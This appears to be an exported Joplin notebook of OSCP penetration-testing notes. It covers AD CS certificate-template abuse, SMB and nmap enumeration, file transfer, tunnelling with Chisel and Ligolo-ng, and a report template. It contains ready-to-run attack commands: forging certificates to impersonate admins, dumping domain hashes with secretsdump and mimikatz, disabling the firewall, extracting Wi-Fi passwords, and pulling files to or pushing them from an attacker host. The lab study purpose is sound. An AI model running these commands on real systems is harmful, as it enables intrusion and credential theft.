## PowerShell:
- `Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=megacorpone,DC=com'`

## Locksmith: 
- Source: https://github.com/TrimarcJake/Locksmith
1.  `Import-Module ./Locksmith.psd1`
2.  `Invoke-Locksmith -Scan All`
3. `Invoke-Locksmith -Scans ESC1`
4. `Invoke-Locksmith -Scans ESC1,ESC2,ESC8`

## Certify:
- `Certify.exe request /ca:ca.megacorponeone.com\domain-DC-CA /template:VulnTemplate /altname:'domain admin'`

## Certipy:

Specify a user account in the SAN:
User Account: 
- `certipy-ad req -u "afsimmons@megacorpone.com" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -template 'vulnerable template' -upn 'xadmin'
- `certipy-ad req -u "afsimmons@megacorpone.com" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -template 'vulnerable template' -upn 'xadmin@megacorpone.com -dns dc.megacorpone.com'
Computer Account: 
- `certipy-ad req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -template 'vulnerable template' -dns 'dc.megacorpone.com'
## Certi
- `python certi.py 'megacorpone.com/afsimmons@dc01.megacorpone.com' megacorpone-DC01-CA -k -n --alt-name spawn --template UserSAN`
`
# Converting the vulnerable ESC1 template:

## OpenSSL

`openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx`

## Rubeus: 

`Rubeus.exe asktgt /user:xadmin /certificate:C:\Temp\cert.pfx`

# Abusing our vulnerable template: 

## certipy
Authenticating with certipy:
- ` certipy-ad auth -pfx vulnerable.pfx -dc-ip 172.21.0.0`
Using secretdumps to dump all user hashes with the extracted hash from certipy:
- impacket-secretsdump 'megacorpone.com/DC1@172.21.0.0' -hashes 'aad3c435b514a4eeaad3b935b51304fe:c46b9e588fa0d112de6f59fd6d58eae3'



Reference: 
 - https://redfoxsec.com/blog/exploiting-misconfigured-active-directory-certificate-template-esc1/
 - https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-one/

id: dc4999da411f436a9521e0e1e18a8bc6
parent_id: e5db134a7ed6458393dd8757b82ddab1
created_time: 2024-08-14T02:16:04.472Z
updated_time: 2024-08-19T03:01:41.496Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132235
user_created_time: 2024-08-14T02:16:04.472Z
user_updated_time: 2024-08-19T03:01:41.496Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1dcb4d790b01144b7ada27167784dae15.md000644 0000000601 14666154175012607 0ustar00000000 000000 Hashes

id: dcb4d790b01144b7ada27167784dae15
created_time: 2024-09-04T21:42:12.831Z
updated_time: 2024-09-04T21:58:28.451Z
user_created_time: 2024-09-04T21:42:12.831Z
user_updated_time: 2024-09-04T21:58:28.451Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 3b564ef55d0146539fe7746097d9d39c
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 2dd954245f006435f91292d8e1af5dbbd.md000644 0000003414 14666154175012632 0ustar00000000 000000 2. Transferring Files

# Services to Host Files on your System: 

General Options: 

FTP:

Install pyftpdlib
- pip3 install pyftpdlib

Pure-ftpd
- sudo apt install pure-ftpd
- service pure-ftpd start

Run (-w flag allows anonymous write access)
- Python3 -m pyftpdlib -p 21 -w

Web: 

- Python3 -m http.server 443
- service apache2 start

Powershell: 

Raw (Will get flagged by AV/AMSI): 

- powershell -c (New-Object Net.WebClient).DownloadFile('http://172.21.0.0:port/file', 'output-file'
- powershell -c Invoke-WebRequest -Uri "http://172.21.0.0" -OutFile "C:\path\file"


Use Powercat: 

Send File:
    powercat -c 10.1.1.1 -p 443 -i C:\inputfile
Recieve File:
    powercat -l -p 8000 -of C:\inputfile

Linux: 

scp: 

- scp [OPTION] [user@]SRC_HOST:]file1 [user@]DEST_HOST:]file2

scp through ssh: 

- scp -P 2322 passwords.txt remote_username@172.21.0.2:/remote/directory

scp remote file to local system: 

- scp remote_username@172.21.0.2:/remote/file.txt /local/directory


# Services to allow you to upload files to your system from the target: 

- SimpleHTTPServer Upload: https://gist.github.com/touilleMan/eb02ea40b93e52604938
    

id: dd954245f006435f91292d8e1af5dbbd
parent_id: c48a7ecde9e143dbb9f968bb2a64a937
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132447
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1dde5b727c2124a80a189dc249683220f.md000644 0000001404 14666154175012460 0ustar00000000 000000 Target

# This is a placeholder to contain all notes regarding the enumeration phase for each target you assess.

id: dde5b727c2124a80a189dc249683220f
parent_id: 5bd1967a3a514e1197ac684a62a8567f
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132421
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1e043ee4ea6164d97a53bffdf217c759e.md000644 0000004437 14666154175013011 0ustar00000000 000000 General Notes Windows

## List all network interfaces, IP, and DNS.

- ipconfig /all
- Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
- Get-DnsClientServerAddress -AddressFamily IPv4 | ft


## List all current connections

netstat -nao

## List firewall state and current configuration

- netsh advfirewall firewall dump
- netsh firewall show state
- netsh firewall show config

# List firewall's blocked ports

- $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports

# Disable firewall

- netsh firewall set opmode disable (Older Versions of Windows)
- netsh advfirewall set allprofiles state off

## List current routing table

- route print
- Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

## List the ARP table

- arp -A
- Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

## List all network shares

- net share

## Wifi Passwords: 

Finding the SSID:
- netsh wland show profile

Obtaining the cleartext password: 
```
netsh wlan show profile <SSID> key=clear- cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on

(netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)}  | Select-String 'Key Content\W+\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }}
```

id: e043ee4ea6164d97a53bffdf217c759e
parent_id: 323971dda5ee4d3bb6b431f59f68ca7b
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132687
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1e0fae0db1ab04c28940102d1ae0c6d04.md000644 0000005451 14666154175012721 0ustar00000000 000000 SMB Enumeration

# Nmap Enumeration: 
```
/usr/share/nmap/scripts/smb-brute.nse
/usr/share/nmap/scripts/smb-enum-domains.nse
/usr/share/nmap/scripts/smb-enum-groups.nse
/usr/share/nmap/scripts/smb-enum-processes.nse
/usr/share/nmap/scripts/smb-enum-services.nse
/usr/share/nmap/scripts/smb-enum-sessions.nse
/usr/share/nmap/scripts/smb-enum-shares.nse
/usr/share/nmap/scripts/smb-enum-users.nse
/usr/share/nmap/scripts/smb-flood.nse
/usr/share/nmap/scripts/smb-ls.nse
/usr/share/nmap/scripts/smb-mbenum.nse
/usr/share/nmap/scripts/smb-os-discovery.nse
/usr/share/nmap/scripts/smb-print-text.nse
/usr/share/nmap/scripts/smb-protocols.nse
/usr/share/nmap/scripts/smb-psexec.nse
/usr/share/nmap/scripts/smb-security-mode.nse
/usr/share/nmap/scripts/smb-server-stats.nse
/usr/share/nmap/scripts/smb-system-info.nse
```

- nmap --script smb-* -p 139,445, 172.21.0.0
- nmap --script smb-enum-* -p 139,445, 172.21.0.0



# Enum4linux:

- Enum4linux -a 172.21.0.0
- Enum4linux -U 172.21.0.0
- Enum4linux -r 172.21.0.0
- Enum4linux -S 172.21.0.0

# Enum4linux-Ng
https://github.com/cddmp/enum4linux-ng
- Enum4linux 172.21.0.0 -A
- Enum4linux-ng 172.21.0.0 -A -C
- Enum4linux 172.21.0.0 -S
- Enum4linux 172.21.0.0 -K ticket.kirbi -A

# SMBmap:

- smbmap -H 172.21.0.0 -d [domain] -u [user] -p [password]
- smbmap -H 172.21.0.0 -d [domain] -u "" -p ""

# SMBClient: 

- smbclient -L 172.21.0.0
- smbclient //172.21.0.0/tmp

Recursively list a directory: 
```
$ smbclient \\\\x.x.x.x\\Folder
smb: \> recurse on             
smb: \> ls
```

# Impacket: 

## Smbclient:
- /usr/share/doc/python3-impacket/examples/smbclient.py username@172.21.0.0
- impacket-smbclient username@172.21.0.0
## Samdump:
- Impackert-sam SMB 172.21.0.0

# RPCclient: 

- rpcclient -U "" -N 172.21.0.0 enumdomusers

# NetExec: 

- netexec smb -L 
- netexec172.21.0.0 -u Administrator -H [hash] --local-auth
- netexec 172.21.0.0 -u Administrator -H [hash] --share
- netexec smb --gen-relay-list smb-targets.txt 172.21.0.0/24
- netexec smb 172.21.0.0/24 -u user -p 'Password' --local-auth -M mimikatz
- netexec smb x.x.x.x --pass-pol -u '' -p ''

# Polenum:
Note (In Kali):  sudo apt install polenum
- polenum -u '' -p '' -d x.x.x.x

 



id: e0fae0db1ab04c28940102d1ae0c6d04
parent_id: 5d5883588bb347e790e78733ca62cc4c
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-08-07T16:50:25.297Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132388
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-08-07T16:50:25.297Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1e1f96f7790724870a99a89eeff87af30.md000644 0000003344 14666154175012620 0ustar00000000 000000 3. Searchsploit

## Installing searchsploit (Already in Kali)

- apt update && apt install exploitdb

## Install binsploits
Note: bin-sploits contains a set of compiled binaries that are tied to exploits in the exploitdb database. Installing this package will take some time depending on your network connection. 

- apt update && apt install exploitdb-bin-sploits

## updating searchsploit

- searchsploit -u

## Basic Searching: 

- searchsploit <program> <Operating System> <programming language> <version #> etc
- searchsploit -t php windows

## Exclude unwanted results
- searchsploit linux kernel 5.2 --exclude="Poc"

## View exploits from Searchsploit
- searchsploit 9542 --examine
- searchsploit -x window/remote/42031.py


## Copy exploit to current working directory
- searchsploit -m <Exploit Title> <Path>

## Access Exploits from Exploit-DB website: 
- searchsploit vsftpd 2.3.4 -w

## Run an nmap scan result through searchsploit: 
1. Nmap -Pn 172.21.0.0 -oX results.xml
2. searchsploit -x --nmap results.xml

Referneces: 

- https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf

id: e1f96f7790724870a99a89eeff87af30
parent_id: c48a7ecde9e143dbb9f968bb2a64a937
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132454
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1e4a389e44fa04d8b88858723ab3f4823.md000644 0000003553 14666154175012514 0ustar00000000 000000 7. ESC6 Certificate Templates

# General Overview

ESC6 occurs when the CA sets the EDITF_ATTRIBUTESUBJECTALTNAME2 flag, which allows the enrollee to specify an arbitrary SAN on all certificates, regardless of the template's configuration. Following the patch for CVE-2022-26923, this technique no longer works in isolation and must be combined with ESC10.

The attack method is similar to ESC1, with the difference being that you can select any certificate template that supports client authentication. After the May 2022 security updates, new certificates include a security extension that embeds the requester's objectSid property. In ESC1, this property is derived from the SAN specified, but in ESC6, it reflects the requester's actual objectSid, not the SAN. The following example illustrates how the objectSid changes depending on the requester. (EDIT_ATTRIBUTESUBJECTALTNAME2)

We can use certutil to check if this setting is enabled: 

-  certutil -config "CA_HOST\CA_NAME" -getreg "policy\EditFlags"



# Abusing ESC6 Certificate Templates
## Certipy: 
- `certipy-ad req -u "afsimmons@megacorpone.com" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -template 'vulnerable template' -alt 'xadmin@megacorpone.com'

id: e4a389e44fa04d8b88858723ab3f4823
parent_id: e5db134a7ed6458393dd8757b82ddab1
created_time: 2024-08-30T03:36:36.043Z
updated_time: 2024-08-30T17:54:54.860Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132274
user_created_time: 2024-08-30T03:36:36.043Z
user_updated_time: 2024-08-30T17:54:54.860Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1e5db134a7ed6458393dd8757b82ddab1.md000644 0000000613 14666154175012716 0ustar00000000 000000 Enumerating ADCS

id: e5db134a7ed6458393dd8757b82ddab1
created_time: 2024-09-04T21:42:12.191Z
updated_time: 2024-09-04T21:42:12.191Z
user_created_time: 2024-09-04T21:42:12.191Z
user_updated_time: 2024-09-04T21:42:12.191Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 5abb8619041a4e3a9db073dd97403fa1
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 2e655887bcbd448d2a8b59fb715eb22a9.md000644 0000017165 14666154175012736 0ustar00000000 000000 Windows

# Check if your tunnel/port forward is active and running:

## Command line:
- netstat -nao
- route print
- netsh interface portproxy show all

## PowerShell
- Get-NetIPConfiguration
- Test-Connection -ComputerName <remote_ip_or_hostname> -Source <tunnel_interface_ip>
# Tools for Creating a Port Forward or Tunnel on Windows:

## OpenSSH:
```
ssh -L <local_port>:<remote_address>:<remote_port> <username>@<remote_host>
```

## Plink:
Source: https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
Plink Binary Located in Kali Linux: /usr/share/windows-binaries
```
plink -L <local_port>:<remote_address>:<remote_port> <username>@<remote_host>
```

# Netsh:

```
netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp

# Context:
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=443 connectaddress=172.21.0.0 connectport=443
# Verify port forward was created:
netsh interface portproxy show all
# Remove port forward
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=443
```

# Proxifier

## 1. Download and Install Proxifier
- Go to the [Proxifier website](https://www.proxifier.com/download/) and download the latest version of Proxifier.
- Install Proxifier by following the installation wizard.

## 2. Open Proxifier
- Launch Proxifier from the Start menu or desktop shortcut.

## 3. Configure a Proxy Server
- Go to `Profile` > `Proxy Servers...`
- Click `Add` to add a new proxy server.
- Enter the details of the proxy server you want to use:
  - **Address:** The IP address or hostname of the proxy server.
  - **Port:** The port number of the proxy server.
  - **Protocol:** Choose the protocol (SOCKS 4, SOCKS 5, or HTTPS).
  - If the proxy server requires authentication, check the `Enable` box under `Authentication` and enter your username and password.
- Click `OK` to add the proxy server.

## 4. Create a Proxification Rule
- Go to `Profile` > `Proxification Rules...`
- Click `Add` to create a new rule.
- In the `Rule` dialog:
  - **Name:** Give your rule a descriptive name.
  - **Applications:** Specify the applications that should use the tunnel. You can leave this as `Any` to apply to all applications.
  - **Target Hosts:** Specify the target hosts. You can leave this as `Any` to apply to all destinations.
  - **Action:** Choose the proxy server you configured earlier.
- Click `OK` to create the rule.

## 5. Verify the Configuration
- Ensure that the rule you created is listed and enabled in the Proxification Rules window.
- Click `OK` to save and apply the rules.

## Example Configuration
``` 
Proxy Server Configuration
- **Address:** `proxy.example.com`
- **Port:** `1080`
- **Protocol:** `SOCKS 5`
- **Authentication:** Enabled (if required)
  - **Username:** `your_username`
  - **Password:** `your_password`

## Proxification Rule Configuration
- **Name:** `My Tunnel`
- **Applications:** `Any`
- **Target Hosts:** `Any`
- **Action:** Use the proxy server `proxy.example.com`
```

# Chisel

## Step 1: Download Chisel
1. Source: [Chisel releases page](https://github.com/jpillora/chisel/releases).
2. Download the appropriate version for Windows (e.g., `chisel-windows-amd64.exe`).

## Step 2: Set Up the Chisel Server (On the Remote Host)
1. Place the `chisel` executable on your remote server.
2. Open a terminal on the remote server.
3. Start the Chisel server with the following command:

    ```bash
    ./chisel server --reverse --port <server_port>
    ```

    - Replace `<server_port>` with the port you want Chisel to listen on (e.g., `8000`).

    Example:

    ```bash
    ./chisel server --reverse --port 8000
    ```

## Step 3: Configuring Chisel Client for Windows
1. Place the downloaded `chisel-windows-amd64.exe` executable on your Windows machine.
2. Open Command Prompt or PowerShell.
3. Run the Chisel client with the following command:

    ```powershell
    chisel-windows-amd64.exe client <server_address>:<server_port> R:<local_port>:<remote_address>:<remote_port>
    ```

    - Replace `<server_address>` with the IP address or hostname of your remote server.
    - Replace `<server_port>` with the port the Chisel server is listening on.
    - Replace `<local_port>` with the local port you want to use.
    - Replace `<remote_address>` with the target address you want to access through the tunnel.
    - Replace `<remote_port>` with the target port you want to access through the tunnel.

    Example:

    ```powershell
    chisel-windows-amd64.exe client 172.21.0.0:8000 R:8080:localhost:80
    ```

    This command forwards local port `8080` to `localhost:80` on the remote server.

# Ligolo-ng

## Step 1: Download Ligolo-ng
1. Go to the [Ligolo-ng releases page](https://github.com/tnpitsecurity/ligolo-ng/releases).
2. Download the appropriate version for Windows (e.g., `ligolo-ng-agent-windows-amd64.exe` and `ligolo-ng_proxy_X.X-alpha_windows_amd64.zip`).
3. If we are running the ligolo proxy on kali linux we can pull it from the Kali Repo:
```
sudo apt install ligolo-ng
```
4. Download the Wintun driver (https://www.wintun.net/) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).
## Step 2: Set Up the Ligolo-ng Proxy Server
1. Create a tunnel interface: 
```
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip route add 172.21.0.0/24 dev ligolo
sudo ip link set ligolo up
```

For newer versions >= v0.6 we can use interface_create command to have ligolo create a new interface for us. 
## Step 3: Starting the ligolo-ng proxy server
1. In Kali Linux: 
```
$ ligolo-proxy -h # Help options
$ ligolo-proxy -autocert # Automatically request LetsEncrypt certificates
$ ligolo-proxy -selfcert -laddr 0.0.0.0:443 # Use self-signed certificates with custom local address and port
```

## Step 4: Initialize Ligolo agent on Windows: 
1. Place the downloaded `ligolo-ng-agent-windows-amd64.exe` executable on your Windows machine.
2. Open Command Prompt or PowerShell.
3. Run the Ligolo-ng agent with the following command:
```
ligolo-ng-agent-windows-amd64.exe -connect 172.21.0.0:443
ligolo-ng-agent-windows-amd64.exe -connect 172.21.0.0:443 -ignore-cert # This is dangerous!
```
4. Once the agent is running you should see a notification from the proxy: 
```
INFO[0104] Agent joined. name=afsimmons@ntworkstation remote="XX.XX.XX.XX:36000"
```
## Step 5: Start the tunnel: 
1. Use the session command to select the agent: 
```
ligolo-ng » session 
? Specify a session : 1 - afsimmons@ntworkstation - XX.XX.XX.XX:36000
```
2. Start the session
```
tunnel_start --tun ligolo
INFO[0690] Starting tunnel to afsimmons@ntworkstation   
```

## Step 6 (Optional):
In case your windows route is not working correctly you can add a route to call to the proxy by using the following commands: 
```
> netsh int ipv4 show interfaces

Idx     Met        MTU          State                Name
---  ----------  ----------  ------------  ---------------------------
 20           25       65535  connected     ligolo
   
> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]
```


id: e655887bcbd448d2a8b59fb715eb22a9
parent_id: 4869250b5e7045b3ae62e7b6f02cac08
created_time: 2024-08-06T04:28:58.020Z
updated_time: 2024-08-07T04:56:17.593Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132068
user_created_time: 2024-08-06T04:28:58.020Z
user_updated_time: 2024-08-07T04:56:17.593Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1e6df81f47c504114815d673a9e3caa98.md000644 0000004452 14666154175012564 0ustar00000000 000000 Nmap

# Notes: 
- remember to run nmap with sudo privlieges or set some linux capabilities to give nmap the required privileges it needs. 

To set Linux Capabilities on Nmap:
```
sudo apt-get install libcap2-bin
sudo setcap cap_net_raw,cap_net_admin,cap_net_bind_service+eip $(which nmap)
getcap $(which nmap)
nmap --privileged
```

# Default Scans
- nmap -sC -sV 172.21.0.0
- nmap -Pn -sC -sV -p- 172.21.0.0
- nmap -sV -Pn 172.21.0.0
- nmap -T4 -sC -sV 172.21.0.0
- nmap -vv -Pn -A -sC -sS -T 4 -p- 172.21.10.0/24 -oA fullscan


# Stealth Scans: 
- nmap -sS -sC -sV 172.21.0.0
- nmap -sS -p- 172.21.0.0

# UDP Scan: 
- nmap -sS -sU -Pn -sV 172.21.0.0
- nmap -sU -A --top-ports=20 --version-all
- nmap -sU -A -p 53,67,68,161,162 --version-all

# Aggressive Scans: 
Once you have obtain results from your initial scan, run an aggressive scan in the background to obtain more information from the initial scan you executed: 

```
nmap -oA fullscan-aggressive.txt -T4 -vvv --max-rtt-timeout 300ms --max-retries 3 --host-timeout 30m --max-scan-delay 500ms -Pn -p- --version-intensity 1 -iL fullscan.txt
```

If scans are not completing or skipping hosts too quickly, change the `--max-rtt-timeout` and `--max-scan-delay` settings. Additionally, for a slower, more complete, stealthier approach, the following can be used:

```
nmap -sT -Pn -p- --max-parallelism 1 --max-retries 0 --max-rtt-timeout 1000ms --max-hostgroup 1 -oX nmap_x.x.x.x-all_ports_slow.xml -iL x.x.x.x_Active_IPs.txt
```

# Nmap Scripts: 

Location: /usr/share/nmap/scripts/

- nmap --scripts vuln,safe,discovery -oN results.txt target-ip

# Scans through Socks proxy: 

- nmap --proxies socks4://proxy-ip:8080 target-ip


id: e6df81f47c504114815d673a9e3caa98
parent_id: 008bf10b237d494db05d2270f21864df
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-08-07T16:39:17.369Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132034
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-08-07T16:39:17.369Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1e8c0ddff7de4476ab697dbfeeb2fba3e.md000644 0000002721 14666154175013443 0ustar00000000 000000 12. ESC11 Certificate Templates

# General Overview: 

Exploiting ESC11 in AD CS involves abusing certificate templates that allow enrollment for certificates with insufficient security controls, enabling attackers to forge certificates that can impersonate privileged accounts. This can lead to unauthorized access and potential full domain compromise, especially when combined with weak certificate validation or mapping practices.

## Requirements:

- Enforce Encryption for Requests: Disabled
- Encryption is not enforced for ICPR requests and Request Disposition is set to Issue

# Abusing ESC11  Certificate Templates

## Certipy:
- cetipy-ad find -username afsimmons@megacorpone.com -p Spawn123! -dc-ip 172.21.1.5 -stdout
- impacket-ntlmrelayx -t rpc://172.21.1.100 -rpc-mode ICPR -icpr-ca-name megacorp-DC-CA -smb2support

id: e8c0ddff7de4476ab697dbfeeb2fba3e
parent_id: e5db134a7ed6458393dd8757b82ddab1
created_time: 2024-09-03T04:29:50.060Z
updated_time: 2024-09-03T04:58:11.188Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132220
user_created_time: 2024-09-03T04:29:50.060Z
user_updated_time: 2024-09-03T04:58:11.188Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1ea863b45ee66498c905dbf16b0eac900.md000644 0000000614 14666154175012712 0ustar00000000 000000 Editable Services

id: ea863b45ee66498c905dbf16b0eac900
created_time: 2024-09-04T21:42:12.530Z
updated_time: 2024-09-04T21:57:52.385Z
user_created_time: 2024-09-04T21:42:12.530Z
user_updated_time: 2024-09-04T21:57:52.385Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 533f89ee69a545b7a416b814f14e5d3d
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 2f03d530e1dd54b3a966f1cf8323a483c.md000644 0000040565 14666154175012630 0ustar00000000 000000 OSCP Report Template V2

# <div align="center"> Offensive Security Lab/Exam Penetration Test Report </div>

![d2550626a1c94aeebd273d43be0669c9.png](Pentest_Template_Master_4.0/_resources/d2550626a1c94aeebd273d43be0669c9.png)

## <div align="center">  student@emailaddress.com Student-ID </div>

###### <div align="center"> 2023-XX-XX </div>


<div style="page-break-after: always;"></div>



# Offensive Security OSCP Exam Report

## Introduction

The Offensive Security Exam penetration test report contains all efforts that were conducted in order to pass the Offensive Security course.
This report should contain all items that were used to pass the overall exam and it will be graded from a standpoint of correctness and fullness to all aspects of the exam.
The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional.

## Objective

The objective of this assessment is to perform an internal penetration test against the Offensive Security Lab and Exam network.
The student is tasked with following methodical approach in obtaining access to the objective goals.
This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report.
An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course.
Use the sample report as a guideline to get you through the reporting.

## Requirements

The student will be required to fill out this penetration testing report fully and to include the following sections:

- Overall High-Level Summary and Recommendations (non-technical)
- Methodology walkthrough and detailed outline of steps taken
- Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable.
- Any additional items that were not included

# High-Level Summary

Alfred Simmons was tasked with performing an internal penetration test towards Offensive Security Labs.
An internal penetration test is a dedicated attack against internally connected systems.
The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Security's internal lab systems - the THINC.local domain.
Alfred's overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.

When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Security's network.
When performing the attacks, Alfred was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations.
During the testing, Alfred had administrative level access to multiple systems.
All systems were successfully exploited and access granted.
These systems as well as a brief description on how access was obtained are listed below:

- Active Directory Set:
  - HOSTNAME - Name of initial exploit
  - HOSTNAME - Name of initial exploit
  - HOSTNAME - Name of initial exploit
- Standalone 1 - HOSTNAME - Name of initial exploit
- Standalone 2 - HOSTNAME - Name of initial exploit
- Standalone 3 - HOSTNAME - Name of initial exploit

## Sample Report - Recommendations

Alfred recommends patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future.
